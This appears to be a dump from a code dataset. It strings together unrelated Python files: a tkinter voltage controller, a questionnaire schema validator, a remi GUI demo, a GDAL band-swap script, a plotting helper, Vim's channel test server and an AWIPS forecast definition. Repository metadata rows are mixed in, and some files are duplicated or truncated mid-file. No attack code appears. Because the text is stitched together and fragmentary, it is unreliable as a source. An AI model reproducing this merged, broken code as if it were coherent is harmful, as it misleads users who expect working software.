# We will not have an accurate table until we verify the whole electrical system in hardware
voltMappings = [0,12,15,18,20,22,24,26,29] + [round(i*0.95) for i in range(31,107)]
if voltageIndex < 0:
return 0
if voltageIndex > 84:
return voltMappings[84]
return voltMappings[voltageIndex]
def quit():
ser.write(bytes([0]))
cam.Close()
frame.destroy()
sys.exit("Exiting")
def incVoltage():
if voltIndex.get() < 84:
print("Increasing Voltage" + str(voltIndex.get()))
voltIndex.set(voltIndex.get() + 1)
voltageTxt.set("Current Vpp (est): " + str(voltageMap(voltIndex.get())))
ser.write(bytes([voltIndex.get()]))
def decVoltage():
if voltIndex.get() > 0:
voltIndex.set(voltIndex.get() - 1)
voltageTxt.set("Current Vpp (est): " + str(voltageMap(voltIndex.get())))
print("Decreasing Voltage")
if voltIndex.get() == 0:
ser.write(bytes([0]))
else:
ser.write(bytes([voltIndex.get()]))
ser = serial.Serial('com3', 9600)
ser.write(bytes([0]))
frame = tkinter.Tk()
frame.geometry('1000x800')
frame.title("Cytomech DEP Controller")
lgFont = "Times 20 bold"
PIL_image = np.ones((900,600))*150
tk_image = ImageTk.PhotoImage(master=frame,image=Image.fromarray(PIL_image))
imgLbl = tkinter.Label(frame,image=tk_image,width=900,height=600)
imgLbl.pack()
decVoltageBtn = tkinter.Button(frame,
text="-",
font=lgFont,
command=decVoltage,
height = 2,
fg = "black",
bg = 'yellow',
width = 4,
bd = 5,
activebackground='white'
)
#decVoltageBtn.grid(row=1,column=1,rowspan=2, padx=20, pady=5)
decVoltageBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
voltageTxt = tkinter.StringVar(master=frame)
voltIndex = tkinter.IntVar(master=frame)
voltIndex.set(0)
voltageTxt.set("Current Vpp (est): 0")
voltLbl = tkinter.Label(frame,textvariable=voltageTxt, width = 15,font=lgFont)
#voltLbl.grid(row=3,column=1,columnspan=3, padx=20, pady=5)
voltLbl.pack(pady = 10,expand=True,fill='both',side="left")
incVoltageBtn = tkinter.Button(frame,
text="+",
font=lgFont,
command=incVoltage,
height = 2,
fg = "black",
bg = 'green',
width = 4,
bd = 5,
activebackground='white'
)
#incVoltageBtn.grid(row=1,column=3,rowspan=2)
incVoltageBtn.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
photoBtn = tkinter.Button(frame,
text="Take Photo",
font=lgFont,
command=takePhoto,
height = 2,
fg = "black",
bg = '#FF7715',
width = 10,
bd = 5,
activebackground='white'
)
#photoBtn.grid(row=4,column=1,rowspan=2, padx=20, pady=5)
photoBtn.pack(padx = 10, pady = 10, ipadx=10,ipady=10,expand=True,fill='both',side="left")
quitButton = tkinter.Button(
frame,
text="QUIT",
font=lgFont,
command=quit,
height = 2,
fg = "black",
width = 5,
bg = 'red',
bd = 5
)
#quitButton.grid(row=4,column=3,rowspan=2, padx=20, pady=5)
quitButton.pack(padx = 10, pady = 10,ipadx=10,ipady=10,expand=True,fill='both',side="left")
tkinter.mainloop() | 2,869 | 8 | 174 |
6ab64ad7f7106d0ba65d4abb10f71d3123886c67 | 10,488 | py | Python | app/validators/sections/section_validator.py | ONSdigital/eq-questionnaire-validator | 7d2f570a31439c3c4e7d60e1894bfdd859e735a9 | [
"MIT"
] | 1 | 2021-09-10T12:03:02.000Z | 2021-09-10T12:03:02.000Z | app/validators/sections/section_validator.py | ONSdigital/eq-questionnaire-validator | 7d2f570a31439c3c4e7d60e1894bfdd859e735a9 | [
"MIT"
] | 67 | 2020-02-05T11:54:27.000Z | 2022-03-03T12:55:25.000Z | app/validators/sections/section_validator.py | ONSdigital/eq-questionnaire-validator | 7d2f570a31439c3c4e7d60e1894bfdd859e735a9 | [
"MIT"
] | 2 | 2021-04-11T07:45:45.000Z | 2021-04-19T14:52:07.000Z | from collections import defaultdict
from app import error_messages
from app.validators.answers import get_answer_validator
from app.validators.blocks import get_block_validator
from app.validators.questionnaire_schema import get_object_containing_key
from app.validators.questions import get_question_validator
from app.validators.routing.new_routing_validator import NewRoutingValidator
from app.validators.routing.new_when_rule_validator import NewWhenRuleValidator
from app.validators.routing.routing_validator import RoutingValidator
from app.validators.routing.when_rule_validator import WhenRuleValidator
from app.validators.validator import Validator
from app.validators.value_source_validator import ValueSourceValidator
| 39.727273 | 93 | 0.618993 | from collections import defaultdict
from app import error_messages
from app.validators.answers import get_answer_validator
from app.validators.blocks import get_block_validator
from app.validators.questionnaire_schema import get_object_containing_key
from app.validators.questions import get_question_validator
from app.validators.routing.new_routing_validator import NewRoutingValidator
from app.validators.routing.new_when_rule_validator import NewWhenRuleValidator
from app.validators.routing.routing_validator import RoutingValidator
from app.validators.routing.when_rule_validator import WhenRuleValidator
from app.validators.validator import Validator
from app.validators.value_source_validator import ValueSourceValidator
class SectionValidator(Validator):
def __init__(self, schema_element, questionnaire_schema):
super().__init__(schema_element)
self.section = schema_element
self.questionnaire_schema = questionnaire_schema
self.context["section_id"] = self.section["id"]
def validate(self):
self.validate_repeat()
self.validate_summary()
self.validate_groups()
self.validate_value_sources()
return self.errors
def validate_repeat(self):
section_repeat = self.section.get("repeat", None)
if section_repeat:
self.validate_list_exists(section_repeat["for_list"])
def validate_summary(self):
section_summary = self.section.get("summary", None)
if section_summary:
for item in section_summary.get("items", []):
self.validate_list_exists(item.get("for_list"))
def validate_list_exists(self, list_name):
if list_name not in self.questionnaire_schema.list_names:
self.add_error(error_messages.FOR_LIST_NEVER_POPULATED, list_name=list_name)
def validate_skip_conditions(self, skip_conditions, origin_id):
for skip_condition in skip_conditions:
when_validator = WhenRuleValidator(
skip_condition["when"], origin_id, self.questionnaire_schema
)
self.errors += when_validator.validate()
def validate_new_skip_conditions(self, skip_condition, origin_id):
when_validator = NewWhenRuleValidator(
skip_condition["when"], origin_id, self.questionnaire_schema
)
self.errors += when_validator.validate()
def validate_value_sources(self):
source_references = get_object_containing_key(self.section, "identifier")
for json_path, source_reference in source_references:
if "source" in source_reference:
value_source_validator = ValueSourceValidator(
value_source=source_reference,
json_path=json_path,
questionnaire_schema=self.questionnaire_schema,
)
self.errors += value_source_validator.validate()
def validate_groups(self):
for group in self.section["groups"]:
self.validate_routing(group, group)
self.validate_blocks(group["id"])
def validate_blocks(self, group_id):
group = self.questionnaire_schema.get_group(group_id)
for block in group.get("blocks"):
self.validate_routing(block, group)
block_validator = get_block_validator(block, self.questionnaire_schema)
self.errors += block_validator.validate()
self.validate_question(block)
self.validate_variants(block)
def validate_routing(self, schema_element, group):
if "routing_rules" in schema_element:
if any("goto" in rule for rule in schema_element["routing_rules"]):
routing_validator = RoutingValidator(
schema_element, group, self.questionnaire_schema
)
else:
routing_validator = NewRoutingValidator(
routing_rules=schema_element["routing_rules"],
group=group,
origin_id=schema_element["id"],
questionnaire_schema=self.questionnaire_schema,
)
self.errors += routing_validator.validate()
if "skip_conditions" in schema_element:
if isinstance(schema_element["skip_conditions"], list):
self.validate_skip_conditions(
schema_element["skip_conditions"], schema_element["id"]
)
elif isinstance(schema_element["skip_conditions"], dict):
self.validate_new_skip_conditions(
schema_element["skip_conditions"], schema_element["id"]
)
def validate_question(self, block_or_variant):
question = block_or_variant.get("question")
if question:
question_validator = get_question_validator(question)
self.errors += question_validator.validate()
for answer in question.get("answers", []):
answer_validator = get_answer_validator(
answer, self.questionnaire_schema
)
answer_validator.validate()
if question.get("summary") and answer["type"] not in [
"TextField",
"Checkbox",
"Number",
]:
self.add_error(
error_messages.UNSUPPPORTED_QUESTION_SUMMARY_ANSWER_TYPE,
answer_id=answer["id"],
)
self.errors += answer_validator.errors
def validate_variants(self, block):
question_variants = block.get("question_variants", [])
content_variants = block.get("content_variants", [])
all_variants = question_variants + content_variants
for variant in question_variants:
self.validate_question(variant)
# This is validated in json schema, but the error message is not good at the moment.
if len(question_variants) == 1 or len(content_variants) == 1:
self.add_error(
error_messages.VARIANTS_HAS_ONE_VARIANT, block_id=block["id"]
)
for variant in all_variants:
when_clause = variant.get("when", [])
when_validator = WhenRuleValidator(
when_clause, block["id"], self.questionnaire_schema
)
self.errors += when_validator.validate()
self.validate_variant_fields(block, question_variants)
def validate_variant_fields(self, block, variants):
""" Ensure consistency between relevant fields in variants
- Ensure that question_ids are the same across all variants.
- Ensure answer_ids are the same across all variants.
- Ensure question types are the same across all variants.
- Ensure answer types are the same across all variants.
- Ensure default answers are the same across all variants.
"""
if not variants:
return
results = self._get_question_variant_fields_sets(variants)
if len(results["number_of_answers"]) > 1:
self.add_error(
error_messages.VARIANTS_HAVE_DIFFERENT_ANSWER_LIST_LENGTHS,
block_id=block["id"],
)
if len(results["question_ids"]) != 1:
self.add_error(
error_messages.VARIANTS_HAVE_DIFFERENT_QUESTION_IDS,
block_id=block["id"],
question_ids=results["question_ids"],
)
if len(results["question_types"]) != 1:
self.add_error(
error_messages.VARIANTS_HAVE_MULTIPLE_QUESTION_TYPES,
block_id=block["id"],
question_types=results["question_types"],
)
if len(results["default_answers"]) > 1:
self.add_error(
error_messages.VARIANTS_HAVE_DIFFERENT_DEFAULT_ANSWERS,
block_id=block["id"],
question_ids=results["question_ids"],
)
if len(results["answer_ids"]) != next(iter(results["number_of_answers"])):
self.add_error(
error_messages.VARIANTS_HAVE_MISMATCHED_ANSWER_IDS,
block_id=block["id"],
answer_ids=results["answer_ids"],
)
for answer_id, type_set in results["answer_types"].items():
if len(type_set) != 1:
self.add_error(
error_messages.VARIANTS_HAVE_MISMATCHED_ANSWER_TYPES,
block_id=block["id"],
answer_types=type_set,
answer_id=answer_id,
)
@staticmethod
def _get_question_variant_fields_sets(variants):
results = {
"question_ids": set(),
"question_types": set(),
"answer_ids": set(),
"answer_types": defaultdict(set),
"default_answers": set(),
"number_of_answers": set(),
}
for variant in variants:
question_variant = variant["question"]
results["question_ids"].add(question_variant["id"])
results["question_types"].add(question_variant["type"])
for answer in question_variant["answers"]:
results["answer_ids"].add(answer["id"])
results["answer_types"][answer["id"]].add(answer["type"])
results["default_answers"].add(answer.get("default"))
results["number_of_answers"].add(len(results["answer_ids"]))
# Code to handle comparison of variants which contain a MutuallyExclusive answer type
if (
len(results["question_types"]) > 1
and "MutuallyExclusive" in results["question_types"]
):
results["question_types"].remove("MutuallyExclusive")
results["answer_ids"].clear()
results["number_of_answers"].clear()
for variant in variants:
if variant["question"]["type"] == "MutuallyExclusive":
non_exclusive_answer = variant["question"]["answers"][0]
results["answer_ids"].add(non_exclusive_answer["id"])
else:
for answer in variant["question"]["answers"]:
results["answer_ids"].add(answer["id"])
results["number_of_answers"].add(len(results["answer_ids"]))
return results
| 7,144 | 2,590 | 23 |
47fe2037f0c7cb92585e4d15d11841e6a8393752 | 1,362 | py | Python | examples/selection_input_app.py | zelogik/remi | 074f0e856d1634a0a8155626d8dd2135feb99544 | [
"Apache-2.0"
] | 3,224 | 2015-10-30T15:35:05.000Z | 2022-03-08T19:31:46.000Z | examples/selection_input_app.py | Ksengine/remi | 4ccb06581a70c101807b740ef587065aa70b17ce | [
"Apache-2.0"
] | 453 | 2015-10-26T17:39:01.000Z | 2022-03-07T13:57:18.000Z | examples/selection_input_app.py | Ksengine/remi | 4ccb06581a70c101807b740ef587065aa70b17ce | [
"Apache-2.0"
] | 458 | 2015-11-03T12:08:01.000Z | 2022-03-09T00:17:19.000Z | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import remi.gui as gui
from remi import start, App
import os
if __name__ == "__main__":
# starts the webserver
start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=None)
| 35.842105 | 108 | 0.701909 | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import remi.gui as gui
from remi import start, App
import os
class MyApp(App):
def main(self):
# creating a container VBox type, vertical (you can use also HBox or Widget)
main_container = gui.VBox(width=300, height=200, style={'margin': '0px auto'})
label = gui.Label("Select a fruit")
selection_input = gui.SelectionInputWidget(['banana', 'apple', 'pear', 'apricot'], 'banana', 'text')
selection_input.oninput.do(lambda emitter, value: label.set_text("event oninput: %s"%value))
main_container.append([label, selection_input])
# returning the root widget
return main_container
if __name__ == "__main__":
# starts the webserver
start(MyApp, address='0.0.0.0', port=0, start_browser=True, username=None, password=None)
| 545 | -4 | 49 |
1e2d84940a05efd0cc8e5fbe8f9be589dfffd985 | 543 | py | Python | Chapter06/B13346_06_01-swap.py | shahidnawazkhan/geog786course | e2d425875d183af3f0d5d54bb7c01033f5b2926f | [
"MIT"
] | 97 | 2019-06-21T21:59:23.000Z | 2022-03-30T17:00:46.000Z | Chapter06/B13346_06_01-swap.py | Fall-in-love-with-Kikyo/Learning-Geospatial-Analysis-with-Python-Third-Edition | 5f4961837d762cffbf67338e0237313ea89dbb48 | [
"MIT"
] | 3 | 2021-10-19T02:31:15.000Z | 2022-01-18T04:45:07.000Z | Chapter06/B13346_06_01-swap.py | Fall-in-love-with-Kikyo/Learning-Geospatial-Analysis-with-Python-Third-Edition | 5f4961837d762cffbf67338e0237313ea89dbb48 | [
"MIT"
] | 61 | 2019-04-07T22:53:30.000Z | 2022-03-28T03:01:11.000Z | """Swap bands in a raster satellite image"""
# http://git.io/vqs41
from gdal import gdal_array
# name of our source image
src = "FalseColor.tif"
# load the source image into an array
arr = gdal_array.LoadFile(src)
# swap bands 1 and 2 for a natural color image.
# We will use numpy "advanced slicing" to reorder the bands.
# Using the source image
output = gdal_array.SaveArray(arr[[1, 0, 2], :], "swap.tif",
format="GTiff", prototype=src)
# Dereference output to avoid corrupted file on some platforms
output = None | 28.578947 | 62 | 0.703499 | """Swap bands in a raster satellite image"""
# http://git.io/vqs41
from gdal import gdal_array
# name of our source image
src = "FalseColor.tif"
# load the source image into an array
arr = gdal_array.LoadFile(src)
# swap bands 1 and 2 for a natural color image.
# We will use numpy "advanced slicing" to reorder the bands.
# Using the source image
output = gdal_array.SaveArray(arr[[1, 0, 2], :], "swap.tif",
format="GTiff", prototype=src)
# Dereference output to avoid corrupted file on some platforms
output = None | 0 | 0 | 0 |
768377607dcaeb9485796c28ca8047ebf64714e5 | 2,398 | py | Python | analysisTools/plot_builder.py | anastasiia-kornilova/sound_direction | ad7e5eec2d9f3417bb6996d088edd88e1ea5acc0 | [
"Apache-2.0"
] | 1 | 2021-02-04T11:02:11.000Z | 2021-02-04T11:02:11.000Z | analysisTools/plot_builder.py | anastasiia-kornilova/sound_direction | ad7e5eec2d9f3417bb6996d088edd88e1ea5acc0 | [
"Apache-2.0"
] | null | null | null | analysisTools/plot_builder.py | anastasiia-kornilova/sound_direction | ad7e5eec2d9f3417bb6996d088edd88e1ea5acc0 | [
"Apache-2.0"
] | 1 | 2018-10-14T16:07:01.000Z | 2018-10-14T16:07:01.000Z | import os
import matplotlib.pyplot as plt
import scipy.io.wavfile as wav
from runner import Runner
| 33.774648 | 99 | 0.537114 | import os
import matplotlib.pyplot as plt
import scipy.io.wavfile as wav
from runner import Runner
class PlotBuilder(object):
__angle_plt_name = 'angle_'
__plt_ext = '.png'
def __init__(self):
pass
def plot_sensor_out(self, data, params, destdir):
test_path = params['input_filename']
test_name = os.path.splitext(os.path.basename(test_path))[0]
window_size = params['window_size']
history_depth = params['history_depth']
rate, wavdata = wav.read(test_path)
left_chl = wavdata[:, 0]
right_chl = wavdata[:, 1]
fig, plts = plt.subplots(4, 1, sharex=True)
fig.set_size_inches(14., 10.)
xlen = len(left_chl)
pcm_range = range(int(-3 * 1e4), int(4 * 1e4), int(1e4))
# plts[0].axis([0, xlen, -2e15, 2e15])
plts[0].set_title('Left channel')
plts[0].set_yticks(pcm_range)
plts[0].plot(left_chl, color='blue', linestyle='-')
# plts[1].axis([0, xlen, -2e15, 2e15])
plts[1].set_title('Right channel')
plts[1].set_yticks(pcm_range)
plts[1].plot(right_chl, color='blue', linestyle='-')
wdots = range(0, xlen + window_size, window_size)
wdots = wdots[:len(data['angle'])]
# plts[2].axis([0, xlen, 0, 1e-1])
plts[2].set_title('Energy')
plts[2].plot(wdots, data['vad'], color='red', linestyle='-')
plts[3].axis([0, xlen, -90, 90])
plts[3].set_title('Angle')
plts[3].set_xlabel('Sample')
plts[3].set_ylabel('Degree')
plts[3].set_yticks(range(-90, 100, 30))
plts[3].grid(True)
plts[3].plot(wdots, data['angle'], color='green', linestyle='-')
#
# text = ('Test name: {tn} {sep}'
# 'Window size = {ws} samples {sep}'
# 'Hisory depth = {hd} windows {sep}'.format(tn=test_name,
# ws=window_size,
# hd=history_depth,
# sep=os.linesep))
# plts[3].text(1, -120, text, bbox=dict(boxstyle='square,pad=0.3', ec='black', fc='white'))
figname = self.__angle_plt_name + test_name + self.__plt_ext
figname = os.path.join(destdir, figname)
fig.savefig(figname)
plt.close(fig)
| 2,160 | 115 | 23 |
5818f6b495fd1bcb0df047fec6725a29b0d28423 | 131 | py | Python | photo/apps.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | photo/apps.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | photo/apps.py | ruslan-ok/ruslan | fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
from photo.config import app_config
| 21.833333 | 35 | 0.78626 | from django.apps import AppConfig
from photo.config import app_config
class PhotoConfig(AppConfig):
name = app_config['name']
| 0 | 38 | 23 |
6b2947d904a12699c53f85fd20cfcef2e48e9a84 | 12,015 | py | Python | src/testdir/test_channel.py | chestnut1693/vim | bc38f25c021dc4314c77d50a608329a328b0d988 | [
"Vim"
] | 2 | 2020-04-13T04:53:59.000Z | 2020-06-01T14:41:02.000Z | src/testdir/test_channel.py | chestnut1693/vim | bc38f25c021dc4314c77d50a608329a328b0d988 | [
"Vim"
] | null | null | null | src/testdir/test_channel.py | chestnut1693/vim | bc38f25c021dc4314c77d50a608329a328b0d988 | [
"Vim"
] | null | null | null | #!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
if __name__ == "__main__":
main("localhost", 0)
| 44.335793 | 94 | 0.424303 | #!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
while True:
try:
received = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if received == '':
print("=== socket closed ===")
break
print("received: {0}".format(received))
# We may receive two messages at once. Take the part up to the
# newline, which should be after the matching "]".
todo = received
while todo != '':
splitidx = todo.find('\n')
if splitidx < 0:
used = todo
todo = ''
else:
used = todo[:splitidx]
todo = todo[splitidx + 1:]
if used != received:
print("using: {0}".format(used))
try:
decoded = json.loads(used)
except ValueError:
print("json decoding failed")
decoded = [-1, '']
# Send a response if the sequence number is positive.
if decoded[0] >= 0:
if decoded[1] == 'hello!':
# simply send back a string
response = "got it"
elif decoded[1] == 'malformed1':
cmd = '["ex",":"]wrong!["ex","smi"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise it
# sometimes fails on OS X.
time.sleep(0.2)
elif decoded[1] == 'malformed2':
cmd = '"unterminated string'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the double
# quote in the "ok" response terminates the string.
time.sleep(0.2)
elif decoded[1] == 'malformed3':
cmd = '["ex","missing ]"'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the ]
# in the "ok" response terminates the list.
time.sleep(0.2)
elif decoded[1] == 'split':
cmd = '["ex","let '
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
time.sleep(0.01)
cmd = 'g:split = 123"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1].startswith("echo "):
# send back the argument
response = decoded[1][5:]
elif decoded[1] == 'make change':
# Send two ex commands at the same time, before
# replying to the request.
cmd = '["ex","call append(\\"$\\",\\"added1\\")"]'
cmd += '["ex","call append(\\"$\\",\\"added2\\")"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'bad command':
cmd = '["ex","foo bar"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'do normal':
# Send a normal command.
cmd = '["normal","G$s more\u001b"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-works':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\\" . 123", -1]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-special':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\x7f\x10\x01bar\\"", -2]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-getline':
# Send an eval request. We ignore the response.
cmd = '["expr","getline(3)", -3]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-fails':
# Send an eval request that will fail.
cmd = '["expr","xxx", -4]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-error':
# Send an eval request that works but the result can't
# be encoded.
cmd = '["expr","function(\\"tr\\")", -5]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-bad':
# Send an eval request missing the third argument.
cmd = '["expr","xxx"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'an expr':
# Send an expr request.
cmd = '["expr","setline(\\"$\\", [\\"one\\",\\"two\\",\\"three\\"])"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call-func':
cmd = '["call","MyFunction",[1,2,3], 0]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw':
cmd = '["redraw",""]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw!':
cmd = '["redraw","force"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'empty-request':
cmd = '[]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-result':
# Send back the last received eval result.
response = last_eval
elif decoded[1] == 'call me':
cmd = '[0,"we called you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call me again':
cmd = '[0,"we did call you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = ""
elif decoded[1] == 'send zero':
cmd = '[0,"zero index"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "sent zero"
elif decoded[1] == 'close me':
print("closing")
self.request.close()
response = ""
elif decoded[1] == 'wait a bit':
time.sleep(0.2)
response = "waited"
elif decoded[1] == '!quit!':
# we're done
self.server.shutdown()
return
elif decoded[1] == '!crash!':
# Crash!
42 / 0
else:
response = "what?"
if response == "":
print("no response")
else:
encoded = json.dumps([decoded[0], response])
print("sending: {0}".format(encoded))
self.request.sendall(encoded.encode('utf-8'))
# Negative numbers are used for "eval" responses.
elif decoded[0] < 0:
last_eval = decoded
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def writePortInFile(port):
# Write the port number in Xportnr, so that the test knows it.
f = open("Xportnr", "w")
f.write("{0}".format(port))
f.close()
def main(host, port, server_class=ThreadedTCPServer):
# Wait half a second before opening the port to test waittime in ch_open().
# We do want to get the port number, get that first. We cannot open the
# socket, guess a port is free.
if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
port = 13684
writePortInFile(port)
print("Wait for it...")
time.sleep(0.5)
server = server_class((host, port), ThreadedTCPRequestHandler)
ip, port = server.server_address[0:2]
# Start a thread with the server. That thread will then start a new thread
# for each connection.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
writePortInFile(port)
print("Listening on port {0}".format(port))
# Main thread terminates, but the server continues running
# until server.shutdown() is called.
try:
while server_thread.is_alive():
server_thread.join(1)
except (KeyboardInterrupt, SystemExit):
server.shutdown()
if __name__ == "__main__":
main("localhost", 0)
| 11,360 | 109 | 119 |
4fa43d72a0c2f0b29afa1fdf526729a277689f72 | 4,948 | py | Python | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/CWF_Pacific_Site_MultiPil_Definition.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | [
"Apache-2.0"
] | null | null | null | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/CWF_Pacific_Site_MultiPil_Definition.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | [
"Apache-2.0"
] | null | null | null | edexOsgi/com.raytheon.edex.plugin.gfe/utility/common_static/base/gfe/textproducts/templates/utility/CWF_Pacific_Site_MultiPil_Definition.py | srcarter3/awips2 | 37f31f5e88516b9fd576eaa49d43bfb762e1d174 | [
"Apache-2.0"
] | 1 | 2021-10-30T00:03:05.000Z | 2021-10-30T00:03:05.000Z | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
##
# This is a base file that is not intended to be overridden.
##
# ---------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without
# technical support, and with no warranty, express or implied, as to
# its usefulness for any purpose.
#
# CWF_Pacific_<site>_<MultiPil>_Definition.TextUtility
#
# This file sets up all the Product Definition overrides for the
# CWF_Pacific formatter for a site.
#
# ---------------------------------------------------------------------
#**********************************************************************
# MAKE NO CHANGES HERE
# The minimum content of this file is the following Definition statement
Definition = {}
# End MAKE NO CHANGES HERE
#**********************************************************************
#####################################################
# Override VariableList if desired
#
#VariableList = []
#----- WFO <site> CWF_Pacific Definition -----
# Definition Statements must start in column 1.
# REQUIRED CONFIGURATION ITEMS
#Definition['displayName'] = None
Definition['displayName'] = "CWFPacific_<MultiPil>"
Definition["showZoneCombiner"] = 1 # 1 to cause zone combiner to display
Definition["defaultEditAreas"] = "Combinations_CWF_<site>_<MultiPil>"
Definition["mapNameForCombinations"] = "Marine_Zones_<site>" # Map background for creating Combinations
#Special multiple product domains for certain sites:
if "<site>" == "AJK":
if "_<MultiPil>" == "_AJK":
Definition["subDomainUGCs"] = ["PKZ011","PKZ012","PKZ013","PKZ021",
"PKZ022","PKZ031","PKZ032","PKZ033",
"PKZ034","PKZ035","PKZ036"]
elif "_<MultiPil>" == "_AEG":
Definition["subDomainUGCs"] = ["PKZ041","PKZ042","PKZ043","PKZ051",
"PKZ052"]
elif "<site>" == "GUM":
if "_<MultiPil>" == "_MY":
Definition["subDomainUGCs"] = ["PMZ151","PMZ152","PMZ153","PMZ154"]
elif "_<MultiPil>" == "_PQ":
Definition["subDomainUGCs"] = ["PMZ161","PMZ171","PMZ172","PMZ173",
"PMZ174","PMZ181","PMZ191"]
elif "<site>" == "AFG":
if "_<MultiPil>" == "_NSB":
Definition["subDomainUGCs"] = ["PKZ225","PKZ230","PKZ235","PKZ240",
"PKZ245"]
elif "_<MultiPil>" == "_WCZ":
Definition["subDomainUGCs"] = ["PKZ200","PKZ210","PKZ215","PKZ220"]
# Header configuration items
#Definition["productName"] = "Coastal Waters Forecast" # name of product
Definition["fullStationID"] = "<fullStationID>" # full station identifier (4letter)
Definition["wmoID"] = "<wmoID>" # WMO ID
Definition["pil"] = "<pil>" # product pil
Definition["areaName"] = "<state>" # Name of state, such as "Georgia"
Definition["wfoCityState"] = "<wfoCityState>" # Location of WFO - city st
Definition["textdbPil"] = "<textdbPil>" # Product ID for storing to AWIPS text database.
Definition["awipsWANPil"] = "<awipsWANPil>" # Product ID for transmitting to AWIPS WAN.
Definition["outputFile"] = "{prddir}/TEXT/CWF_<MultiPil>.txt"
